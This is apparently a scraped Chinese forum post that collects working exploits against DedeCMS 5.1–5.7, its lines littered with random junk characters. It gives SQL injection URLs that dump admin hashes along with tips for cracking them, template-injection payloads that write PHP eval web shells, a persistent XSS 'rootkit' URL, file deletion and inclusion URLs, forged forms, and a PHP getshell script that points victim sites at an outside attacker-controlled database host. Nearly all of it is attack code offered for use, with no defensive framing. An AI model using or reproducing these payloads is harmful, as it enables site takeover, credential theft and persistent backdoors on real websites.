|
|
4 W' g: S5 V- @( V# i2 F
Dedecms 5.6 rss注入漏洞
+ V) y: S2 F+ Z8 G9 i( v5 s3 ~6 Ohttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1/ l0 `) n; \9 E' T& a
! W# _4 Y. `9 m* g6 C
, n* i" P3 B9 b8 T
6 F: ~, @, I9 Z" N) H' Y5 L% S' }, v5 E/ f9 F; f* X0 n% [' \/ c2 a
/ S7 r$ o) D0 t! K# h C4 V) u6 X
9 s V) H b' K
% V' K2 ^, v4 Z" I7 ^- \- f
8 T( j- @+ f5 u+ E/ XDedeCms v5.6 嵌入恶意代码执行漏洞
+ H! f+ `+ I& }6 c注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57} p8 h; F, F- ]; J! p: x( c$ s7 O
发表后查看或修改即可执行
2 m' j. ~* t5 O' r. M2 W* sa{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
& l* D) ?% Z2 t: ~( p$ n生成x.php 密码xiao,直接生成一句话。/ G9 c3 z) Z0 Y' g
* Q# o1 D5 [8 |" v" { t
1 d, F" Q- _4 ^8 X: V- S3 ]- Z% Z$ t% m. W
3 T$ n9 C7 z" l* D7 Z! b
9 g1 E- e8 z2 o) h( J4 V
& Y* G' L# o9 z; t7 p1 \/ W( Y# N, e9 l" R+ M! Q& u& ?1 h
5 {) x$ O5 d7 R4 y
Dede 5.6 GBK SQL注入漏洞
% Y: d% y" y% I) jhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';, P4 M% A) T9 Z1 W9 x
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
# `4 W; Q! V2 F0 Khttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
7 p7 q6 S$ B" O9 J5 ?1 p, N- V `$ ]( `: U4 g( [: ^& m
" i1 Q/ ?# J/ |/ q8 L0 ?2 B
2 @$ d' O5 z, k& [, [1 R2 ~: \! L/ O' ~7 h/ B1 f+ Z& |" t
" `& z* ]5 m+ v0 j! }# |( i7 w# Q
& w8 |* d, E- i# R
/ |, B. L9 w# P
* e$ _. K- l2 MDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
/ V d+ }# y, _1 Jhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
' E( H% u/ s; X- M# ^8 B" j: F% U1 @6 }4 |# L8 x) I2 |4 o& O
0 ]' W+ d; D9 p% ~9 d% ]
5 d" }* t5 l+ c% ?9 z2 {0 ~6 Q/ s! S
* w% h- t8 l1 z" [* ~2 c: R- n9 I2 ^+ K# T
5 s- ~, e9 ], }' r
DEDECMS 全版本 gotopage变量XSS漏洞- ^- _0 U: ~/ O
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。 % k, w, ~7 p2 P4 N
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
# v/ d) S5 P1 }% x( @2 g! |& y, W" c! I) e8 D" f
( u6 c6 Z, ~" E$ K5 m. d2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 # g( ^% R# F2 J$ S }2 ~3 j0 U
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda1 S& d8 c" J- G1 V
1 Q/ F9 ]/ F* K( k
8 f: J( Y0 _- E3 b$ Nhttp://v57.demo.dedecms.com/dede/login.php
7 \% k- P3 {0 Q' B& @7 A
( h m5 p# {* o: g0 B0 U6 o W8 {7 `0 _+ H$ B8 B9 @7 {
color=Red]DeDeCMS(织梦)变量覆盖getshell: Q- z. |$ B* z3 q
#!usr/bin/php -w& J1 d( V+ ?3 _6 k3 ~
<?php
7 e' g$ C, P/ |/ Terror_reporting(E_ERROR);- V! _5 W, E+ y
set_time_limit(0);
4 z, l( o! N) h6 v. R- ?print_r('
* s/ P# e& }4 T7 A2 HDEDEcms Variable Coverage8 [$ ]2 T7 J2 o% \2 o: Y" Q; ^
Exploit Author: www.heixiaozi.comwww.webvul.com; K' D& V4 G6 o& \4 Z
);
, C" x0 Q1 B! A# w# T h, Yecho "\r\n";
3 @4 f$ v; A |2 E* kif($argv[2]==null){
( Z, B/ [) M8 Y, c; f4 _; \8 Bprint_r('
: h7 |+ ^* Q( p$ U6 g# I, J6 M+---------------------------------------------------------------------------+
' b% B0 p' n7 Y+ Y7 Y- e% aUsage: php '.$argv[0].' url aid path& K/ S8 m& K( p. V3 v7 V/ Q, i
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/7 ?+ F- U9 n, P6 I( X, L
Example:: Z7 _+ x4 @4 \
php '.$argv[0].' www.site.com 1 old
; s/ j3 g6 M2 y6 f- a. y, e+---------------------------------------------------------------------------+2 [- a! K% E: E" r) ]
');% }* O) k3 @4 H' S: r9 B
exit;
! z' S& B8 i6 i$ D}
* ]0 I8 p' m! V5 H7 i3 G1 O% b$url=$argv[1];/ W7 z- r+ E6 I+ S
$aid=$argv[2];0 n* {6 B! o6 o* k7 `) o- T/ e
$path=$argv[3];
7 S! t+ b9 I2 d, w8 r6 F( `$exp=Getshell($url,$aid,$path);
& i# ?! I. |) ?, g7 {if (strpos($exp,"OK")>12){
$ U5 v* N6 _9 C6 p7 e3 a( J" {! i2 ]echo "
$ T( t- r( R: Y+ r+ wExploit Success \n";, x6 r4 s& ^4 q _- r- p
if($aid==1)echo "
# N/ d+ A9 Q Y% r0 F! n% LShell:".$url."/$path/data/cache/fuck.php\n" ;
! n& p0 h7 k* }. S7 h* }
1 x9 B1 l$ W; j: C* _
! h, |9 p7 ?8 }% H; X. _6 `if($aid==2)echo "- T- A/ ]+ @& ]5 I# q/ @
Shell:".$url."/$path/fuck.php\n" ;8 a: _- L, v9 P7 y6 g5 q9 k1 m
3 \; b* o- ~, [: l
9 k. y; l) |/ \" i% o. ^8 S8 Iif($aid==3)echo "4 [: y0 e5 f% K) j- P
Shell:".$url."/$path/plus/fuck.php\n";: \9 a1 H$ T! @0 o! E
3 B+ G; }- k( j* x2 w' r7 g
& v1 O, c$ R8 {
}else{. _7 i3 ]4 ~, a% k S; p0 J
echo "
' R" \5 V$ @7 F$ c) ^5 q% `7 @Exploit Failed \n";
) F9 h: r7 {1 B7 ^}
- I/ o$ b; {5 H, q! A' a) [4 Vfunction Getshell($url,$aid,$path){4 q' g$ b2 n( \5 d2 `8 ~) A
$id=$aid;( ?0 A0 y% {6 `: ]0 ~% r& `- Z
$host=$url;
8 Y e' `; i _4 d( @1 ?$port="80";8 W5 K8 r/ u% x9 {1 U
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";' `. U# O4 ^1 I( ?8 q, Y
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";, M1 R. o# {9 O: e4 b+ u4 [) K
$data .= "Host: ".$host."\r\n";7 g5 k. d8 M& E
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";! m/ @& K4 T4 C; j9 U, @( [
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
, U, g/ j. k! O8 x \) D" k$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
/ Q+ m+ B' l' p9 V+ E7 u//$data .= "Accept-Encoding: gzip,deflate\r\n";
?% H3 `0 M9 Z7 v$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";) x( _( f" h4 s v: b$ O) `: ?3 H
$data .= "Connection: keep-alive\r\n";
9 D4 B8 Y) P% I! \" H$data .= "Content-Type: application/x-www-form-urlencoded\r\n";. |% ]1 _5 ], f& r5 |
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
- s0 F, \' L' W! B- t; O$data .= $content."\r\n";6 \5 p, a1 J$ B% J: ]
$ock=fsockopen($host,$port);) A) S; B0 w9 S) J( J& Z! z
if (!$ock) {
5 b* y/ m7 R5 ~% T& techo "
1 Y3 g+ {0 \9 m$ Q7 O# x* GNo response from ".$host."\n";+ P+ H& V$ [$ z6 S% a
}! ?' @# f5 j7 t( [. H; l K
fwrite($ock,$data);
0 @8 K$ B" [: U2 _3 X7 l$ ~while (!feof($ock)) {5 N U# X, `+ V5 `
$exp=fgets($ock, 1024);' |1 p4 G6 p _5 _$ G/ h
return $exp;
. r& H; L) S# `$ \) j}
A1 K# z0 T0 j0 `9 H6 n) J: K) i}
7 s& w6 [0 N& i
* t/ K4 q& e4 X0 o
, o$ G* e# H1 u2 |?>
9 f2 K/ ]+ g& O% F* i6 t* k! X: T1 O5 j3 D( \
$ J8 O8 ]) ]! u- K, A8 l, k
: D1 S& T& J0 q8 l$ ~8 b5 ?, w! r' q& f/ D5 g8 }
8 E. l# V1 F. G" B! K
$ h6 ^ d; _: k! F0 s1 P; N# ^9 m$ H% U0 }2 \7 B2 E
4 _. ?; ?: |5 X0 { `
8 P1 ]; M% z2 S. J9 V: w& O3 I
9 q: r; ]$ R1 U# O, eDedeCms v5.6-5.7 越权访问漏洞(直接进入后台)0 h6 R+ L5 c! @
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root3 x* [- w$ o( }, H# q' L# N7 s& K3 }
; i0 I1 A* G6 b- c4 ?2 d E5 b) h) V5 K
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
4 D( z, T: j$ E8 G) V# D( _* @0 e- S/ |3 \4 r
$ W( q$ }. Q4 i S S5 j
此漏洞的前提是必须得到后台路径才能实现$ o! }7 [2 p0 _: i
" F5 R$ z& Q, m( m+ U# j$ N$ o& O; _$ c0 X
- z2 r0 I4 [' C$ _) [
2 N! G) L# N3 R& `. d) J; E7 }0 A8 a! f+ m7 Q R+ h$ n
: {8 ^8 l. P) t; C8 W! p3 o1 _6 N# }1 k
7 e x: d$ t6 T$ o* b+ N1 t# X
& w) G1 S, F9 K" O8 }6 B! R4 _& n
% F& t/ h' T" @! c: EDedecms织梦 标签远程文件写入漏洞
$ f% h, J$ _7 _( ~+ X8 ]( A3 L前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
/ w. F# D; e; o
9 e# T* q$ A( ?' p3 _! w- Z; T1 v8 e
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。 + g: O, d1 C3 t& w6 y* k9 m, v/ q
<form action="" method="post" name="QuickSearch" id="QuickSearch">( o3 l( q( G( ~2 h/ N- g" A
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
! g ?/ c- h8 {5 \* ~! {* _<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />- R# u' U4 P+ E( k, V* W
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />0 W5 I/ B. t. D* m" @
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
' g$ i" A; c& M3 x4 r<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
# P) O3 Q. i2 a1 M* y<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />" a2 L* R3 V9 t3 _
<input type="text" value="true" name="nocache" style="width:400">4 N2 c9 _. I" G5 X% T# m
<input type="submit" value="提交" name="QuickSearchBtn"><br />7 B2 p) z* d% l$ Y( x4 w
</form>1 h% N7 J7 k% N' [. J; X3 c4 N
<script>
4 P. b$ Z, P0 T' o: `& mfunction addaction()
, g' G% z s7 `1 p _' U{' a8 r" Z) d" A0 ^& Z
document.QuickSearch.action=document.QuickSearch.doaction.value;9 p4 W ^8 E7 I0 y: A
}
! Q2 l; ~% `6 D</script>
/ f% L1 F5 u& i2 T- t6 e; g+ N& w; c; X( [& @7 a( L- O
7 D& @- ~2 u+ h# d% x1 @& L# _8 H7 @3 S/ i, B q% e$ @$ H1 Z
8 k9 t. n( |& |' W3 ^$ j; A% u
+ A c- S7 A! u6 K
# x1 P& e: |* k' m
9 \1 e# m1 w. u8 y, L) ?" [
) |. p7 W3 u! _. K; M2 \$ ~+ ~' r' L! E1 p
7 I) H# e. _7 e! J3 r( e; y
DedeCms v5.6 嵌入恶意代码执行漏洞
: `) Q# s3 _: O) `& H/ G注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
5 |$ A) t3 I) e* \ ja{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}$ z) T/ ~$ J, B; E5 t+ r
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
' L0 B" a1 O) I. `0 ?Dedecms <= V5.6 Final模板执行漏洞7 P0 B' o! f4 x8 U3 F) G/ m7 W0 A
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:, e/ e, S' U1 j- X
uploads/userup/2/12OMX04-15A.jpg# w1 t& a. o7 z1 l
( w8 N* n* V6 G2 l- R6 ~" ?
. y; b' K) x1 P3 N3 j, A. P! G) {- H模板内容是(如果限制图片格式,加gif89a):" W3 M4 S; P) z/ E2 ]! y9 i
{dede:name runphp='yes'}
) E j8 r) B( c c4 f& f$fp = @fopen("1.php", 'a');9 X% k4 |' @% Y1 r) p& o
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
) h+ s( d4 N8 `% i6 A# A1 _@fclose($fp);; S U( g' K A
{/dede:name} x# F2 ?( A1 A3 I6 P$ u! G
2 修改刚刚发表的文章,查看源文件,构造一个表单:4 b' T W9 @0 s( y, @
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">. q6 z# v* o: t$ p0 X
<input type="hidden" name="dopost" value="save" />/ a0 J( W, R$ z: z
<input type="hidden" name="aid" value="2" />/ A! L' }( ~1 X: Y
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
& s7 T6 O$ [; Q, q<input type="hidden" name="channelid" value="1" />+ a1 a* e5 A5 F- P- l! V" {
<input type="hidden" name="oldlitpic" value="" />3 W* [5 e: \1 }& p8 {6 I
<input type="hidden" name="sortrank" value="1275972263" />1 f. o$ [7 Z& h- |: C
( t4 {& ]4 ]5 A! s8 h) P8 D; @+ G
. s) r. h, X; m: A* K. G1 E+ ~% B) k
<div id="mainCp">
, z* g3 Q4 }' w<h3 class="meTitle"><strong>修改文章</strong></h3>
3 n+ E" N' q7 D! V
" o& g3 C1 {# P3 g" H
4 j/ P* G2 |3 H' }<div class="postForm">7 Q2 H. R4 H% Z/ u
<label>标题:</label>
6 @3 {# }: V# c# o! A( |/ J/ n/ u<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
3 M1 {/ Y. `( u r2 v0 W( P, y+ G
& N/ _/ u3 `4 F f. u9 \. K! D( i% ^
<label>标签TAG:</label>
. Y0 f8 W1 M4 P$ k( q8 l<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
$ L5 t% K9 ^# w1 D2 K; Y0 }2 ~6 D2 C+ u$ S
- B0 e- J& J) r; n/ \
<label>作者:</label>9 X. e8 L, e! ~- e' v
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>; l6 ~' w/ L$ M6 n/ I$ ^8 _
! K9 C0 w( K+ H4 e9 d, W" |
! N# _9 j0 f* a- r# u) z
<label>隶属栏目:</label>0 M* K1 V0 ]5 D4 f/ s. A
<select name='typeid' size='1'>: ]' x: a+ S3 v. X% K* Z- J
<option value='1' class='option3' selected=''>测试栏目</option>3 ?& m- B- Q1 }! `) Y7 w- |
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
t! ]- t7 I7 @0 E( H4 i; r' T
" f* P- j+ l1 A( y. j7 Y& H; Z6 D5 y/ M S: x
<label>我的分类:</label>5 p5 z$ n7 S e: t
<select name='mtypesid' size='1'>+ S/ u, `1 a4 B% Y
<option value='0' selected>请选择分类...</option>+ i3 p4 E: p% m, G
<option value='1' class='option3' selected>hahahha</option>
( E8 c. Q9 q2 P( L* Y</select>
1 k. O, a: K5 P* w# }7 C
1 ~4 B0 q2 v. {, L5 x6 _$ V2 P, }" f, F
% F# W2 O/ s8 i |) Q1 j) O<label>信息摘要:</label>
& i9 D- K1 ?' U! e! [7 M% V ?$ U0 T' r<textarea name="description" id="description">1111111</textarea>& Z2 e4 u: P3 L' v' {
(内容的简要说明); Y& b6 U/ u0 }8 l) j9 A( Z
! |- ~; L7 e' |9 S8 L4 n
) `9 R6 k- G0 F N5 {/ u, H* f
<label>缩略图:</label>
; K* J9 f% h1 A! i' ^' h<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>, n$ a3 Y: S3 `* }! s! e3 e
$ N9 p" w& s4 ?+ N) @$ {7 k) ?9 _6 [
<input type='text' name='templet'
" ?" j% j- Z) {6 J2 Nvalue="../ uploads/userup/2/12OMX04-15A.jpg">4 W O: e. `* g$ D2 l! \
<input type='text' name='dede_addonfields': m. p. U$ _2 Q2 a/ y4 G
value="templet,htmltext;">(这里构造)
2 h* P% m0 K& Q</div>! ]1 K, D" g8 C4 j3 l- A% r$ V
/ `+ n# ^8 B2 H8 i" B0 l* E& d: T" T
. H2 {; b8 l- Q' T4 h6 S<!-- 表单操作区域 -->
, d2 C# q3 O3 G- r# V<h3 class="meTitle">详细内容</h3>( @) d! Z& H3 H6 ], c* O
3 G$ o- ` W% j8 c3 Q9 Q& [" G4 }" s
" w& C0 a8 @5 f# v/ N7 R4 t; m<div class="contentShow postForm">' f" X, T% T) X6 T8 V' w G% u
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
& u$ I6 L# S- t# Q! Q
, j) z9 X& i' P5 w" Q- L) U/ U k5 T% [
<label>验证码:</label>
- A6 X- @+ D; \3 A( n, u<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
1 i# P& A' f" b5 A+ I<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />* l; y8 g V' R" |$ P3 T* j
; g8 L& [% s" D+ z6 L6 Q( `0 Y
8 O% U) B& W; R" G<button class="button2" type="submit">提交</button>! l9 l {' j$ x
<button class="button2 ml10" type="reset">重置</button>
0 o4 _" x. K3 Q! s$ J" i* o</div>) v0 @) r7 g4 h! ]' C
; m6 d' j9 u3 o" y; J# U7 V) e5 i. d. e% F
</div>
# R; K* R+ C, _, u! C! K
7 x& ^+ i* m) A/ P2 p4 ~% j$ U& ]) v+ ?1 X( r0 E+ W6 f, A0 v2 k
</form>
# }- v3 ~9 ^2 c( M, j2 W, ~) }( \: F' [# Z, h T$ e
l- m W. A4 x+ y提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
& W! v6 ^) n" C# R+ A3 [假设刚刚修改的文章的aid为2,则我们只需要访问:
# }0 a H* o9 v/ Dhttp://127.0.0.1/dede/plus/view.php?aid=2
. A4 r/ e: d2 Y: }/ o4 g; n即可以在plus目录下生成webshell:1.php6 H* i1 ^; _/ N6 T* N
. H7 f* @) N$ f9 q8 `3 U5 \ D$ g) y0 h! _1 X) P
- b# ^0 S& K# r& N1 S0 ]3 n) H
3 d3 v/ X$ I: L
3 d3 V6 r; ?& x/ M$ X4 m; M5 Z1 c" r1 O& I! f5 c8 U) A
$ X d+ N# ~% t8 q( w8 a
7 G6 N/ |; W+ ?7 l
0 l9 b! R- U: w! C1 e2 S* f, j8 |7 F( s9 ~, k+ C$ b0 J# v
+ v& r4 M7 B9 T" s% K2 w) h+ z2 D ~, X% P$ j# e
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
/ _8 h1 p. S5 E, lGif89a{dede:field name='toby57' runphp='yes'}: w" x, b; e5 W5 k
phpinfo();5 @* Q3 M2 F$ d
{/dede:field}% M; x% m1 \8 Z/ E8 u: n( ]
保存为1.gif4 u0 [# ]/ `; @4 l5 e5 p( A- N0 R- x
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
+ k- q. x# q% ^" O) }" u<input type="hidden" name="aid" value="7" />
4 \) n. ^) {+ C<input type="hidden" name="mediatype" value="1" /> ; O" K+ c |& i$ C- t1 D$ |
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 4 l$ r8 q' t3 ]% z4 }( V
<input type="hidden" name="dopost" value="save" /> 1 Q$ ^& u- o% d
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
1 \4 S2 O- ^. q; z% c$ E<input name="addonfile" type="file" id="addonfile"/>
\, D3 R0 F! \7 S<button class="button2" type="submit" >更改</button> % ~4 `, X3 E6 O" f/ F Y0 P
</form>
5 e9 L- ]3 T- a' p; |( }2 |# ]8 \' _8 L X! p% y
+ C+ w0 Q; N* u, M3 V! _* a0 K1 n
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
) S* W1 _/ D1 c* J4 t6 d0 c发表文章,然后构造修改表单如下:/ P7 b7 L9 R9 m( j$ C2 f/ V8 s
; |* j* S- \* A0 {
+ R+ w: `/ i7 R, J7 j* P<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> ; E; z q# o7 x9 d) C
<input type="hidden" name="dopost" value="save" /> % l3 V1 Z; @# r5 c- {
<input type="hidden" name="aid" value="2" /> ! o1 Z& ~! C ~+ \% q
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> + D; E- m% C [ b# C
<input type="hidden" name="channelid" value="1" />
) @" ?5 M& z4 u0 c! c3 `<input type="hidden" name="oldlitpic" value="" /> 9 p* H- K4 W: D$ |5 }
<input type="hidden" name="sortrank" value="1282049150" />
: I+ U+ `0 [% K' w<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 0 G/ i# O, X& p) G' [! _5 [% t, n) z
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> " u9 u3 [/ `5 r9 m0 U j# A$ U/ f. B
<select name='typeid' size='1'> 4 R8 K% d( `0 R, P- ]
<option value='1' class='option3' selected=''>Test</option>
c3 R9 [' K. F- K; Z<select name='mtypesid' size='1'>
/ }+ U" a0 x- D<option value='0' selected>请选择分类...</option>
( f7 @4 [9 M" c, w* Q<option value='1' class='option3' selected>aa</option></select> / w' u. b4 X4 @# z1 {" A8 m
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
! b5 H1 t$ C$ [. j<input type='hidden' name='dede_addonfields' value="templet"> 0 X4 K3 S) U" K; Q; b, U5 ~
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
) U$ z4 o" x& q9 R' f<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
2 M; X' D$ i6 G' w0 b* D<button class="button2" type="submit">提交</button>
6 ^- C# {$ z$ G- C ]! F7 e</form>
7 ~; A3 ~! ~% B# [" e- d+ K
; p1 X# L4 H3 c3 J) [( r
6 a. o. K. q) J& }5 ?
6 K9 u% N5 ~, B$ l# E/ z
I8 W. y) X" p& v8 M4 S9 V C9 _1 | ~. {7 k# @
' l* n" g- t. u8 T H( }
/ b6 e7 d' P9 p. X8 ~/ a9 Z0 W7 W6 N4 }( _- R
. Z3 H9 @0 C' ?: @
. @+ C# @0 c% O- H. `, K
# H2 [5 E/ G3 H% Z
% V1 x% E( v. z+ r- Q) M, F织梦(Dedecms)V5.6 远程文件删除漏洞
* G p' Y3 U7 d1 L% E+ xhttp://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif5 A* y e7 k1 v/ p# e% |( X c' l
9 f) o- I5 i. Y" H' t% v
( Q9 K2 e: i& L6 j! I- j& P: a; i# j" X8 S' R
# P0 b3 Z% Q1 H4 J( n. p3 ?
a# |/ c" ]. {* q! k& X
& ~5 m8 N% B0 Y( R1 G8 N
8 ?" }4 Y9 n; T
+ E, U* Y5 N% m. [, U0 Q; r4 U& V
) n* |) M, O4 a6 l6 x9 g1 r
: v8 @# d7 J$ W: u# K' r6 R+ A- H织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
( M6 r1 U) v: `0 w7 P Phttp://www.test.com/plus/carbuya ... urn&code=../../
! r8 J* j) {+ L0 D) a. c- |
( ^& D" S) {0 z0 H% h" n( e% X5 A3 o9 \* l' m
9 S6 m8 N& J, a x/ w1 B/ U
/ [* ~: c+ d/ N! f7 d7 f( z# F$ D& M" T( g; i7 e
7 S; K+ \: W0 A- j8 h8 y
8 r2 k. t$ ?2 b" a! g5 q# m
1 h, J1 T' _$ d' J3 A% J8 {- X ?. N1 M7 q) b
2 W& U! @; u5 v! H3 T- Q7 @
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 + j$ d6 @; [ U6 l
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`" B" p" ^1 n Z& `& e7 [; y
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5) k" s$ |/ e5 t& o
}! _* f5 K6 K3 g7 i0 h
7 F8 ], X' F- a5 c3 _
( U1 T, _+ A$ m
8 g$ N! P" R9 j8 b7 l
0 h) J1 s/ t V8 H3 H) q5 {) R1 @7 {( l) ~( f
8 Y/ g# o; f$ @" K/ A$ g
0 q- T7 B1 s5 q5 g, L4 n, ?6 v
% T( f8 y9 D1 b+ u; ]" j! d6 P8 i. p7 ~" n+ R
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
' _/ \3 ~9 { f8 f* F% _0 ^" x1 chttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='! A9 r2 J% H8 b7 j5 ]
# K8 t. r: Y& g9 D ~
4 w+ E0 I( Q ~- n3 Z4 _
! b1 v7 q: q, f: K4 R# r# W" a
' n! ^0 t& J/ S! X0 h! _2 E: D3 f G3 {8 |4 M; r$ `% k9 {& k
( g( a' G7 y, Y+ M& U7 i9 n
